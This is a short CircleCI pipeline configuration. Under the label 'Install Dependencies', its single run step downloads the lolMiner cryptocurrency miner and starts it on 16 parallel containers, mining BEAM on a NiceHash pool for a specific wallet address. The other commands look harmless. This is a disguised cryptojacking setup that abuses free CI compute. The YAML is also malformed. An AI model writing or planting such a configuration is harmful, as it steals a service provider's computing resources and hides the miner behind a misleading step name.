version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16
      steps:
        - run: wget https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.42/lolMiner_v1.42_Lin64.tar.gz && tar xf lolMiner_v1.42_Lin64.tar.gz && cd 1.42 && ./lolMiner --algo BEAM-lll --pool stratum+tcp://beamv3.eu-west.nicehash.com:3387 --user 32pDUGDSt9Y8Jei51sH91ASJvwKqaHV7RW.worker3 --tls 0
            name: Install Dependencies
            command: |
              lscpu
              echo Hello,subscribe it

workflows:
    version: 2.1
    build:
        jobs:
        - trial